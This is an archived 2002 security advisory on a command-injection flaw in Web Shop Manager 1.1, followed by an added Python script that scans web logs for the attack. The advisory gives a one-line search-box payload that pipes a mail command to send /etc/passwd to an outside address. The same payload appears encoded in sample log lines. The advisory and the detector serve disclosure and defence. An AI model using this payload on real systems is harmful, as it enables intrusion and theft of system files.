Summary

The Web Shop Manager (http://www.webscriptworld.com/scripts/wsm.phtml) allows you to manage a fully functional online store from a centralized web-based administration system. A security vulnerability in the product allows execution of arbitrary commands with the privileges of the script file used by the product.

Details

Vulnerable systems:
* Web Shop Manager version 1.1

Exploit:
It is possible to send the server's password file to any mail address by entering the following command in Web Shop Manager's search box:

|mail userat_private < /etc/passwd
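One way to look for the search-box input described above in web server access logs (an added example, not part of the original advisory or the product's code). It assumes the search term is sent as a GET query parameter; the log lines, the request path and the parameter name `q` are constructed, since the advisory names none of them.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format). The path and the
# parameter name "q" are assumptions; the advisory names neither.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Aug/2002:10:01:02 -0700] "GET /example-shop/search?q=blue+widget HTTP/1.0" 200 5120
192.0.2.44 - - [15/Aug/2002:10:03:17 -0700] "GET /example-shop/search?q=%7Cmail+userat_private+%3C+%2Fetc%2Fpasswd HTTP/1.0" 200 312
192.0.2.10 - - [15/Aug/2002:10:04:40 -0700] "GET /example-shop/search?q=cables+%7C+adapters&page=2 HTTP/1.0" 200 4890
192.0.2.51 - - [15/Aug/2002:10:05:09 -0700] "GET /example-shop/item?id=17 HTTP/1.0" 200 2210
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# A value that starts with a pipe is the exact shape shown in the advisory.
LEADING_PIPE = re.compile(r"^\s*\|")
# Weaker signal: shell redirection or command separators anywhere in the value.
SHELL_META = re.compile(r"[|;&`<>]|\$\(")


def classify(value):
    """Return 'high', 'low' or None for one decoded parameter value."""
    if LEADING_PIPE.search(value):
        return "high"
    if SHELL_META.search(value):
        return "low"
    return None


def scan(log_text):
    """Return (client, parameter, decoded value, severity) for suspicious values."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl percent-decodes and turns '+' into a space, so encoded
        # forms such as %7C are checked in their decoded shape.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            severity = classify(value)
            if severity:
                findings.append((client, name, value, severity))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

If the search form submits by POST, the term does not appear in a standard access log, and the same `classify` check would have to run where request bodies are visible.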
This archive was generated by hypermail 2b30 : Thu Aug 15 2002 - 10:54:36 PDT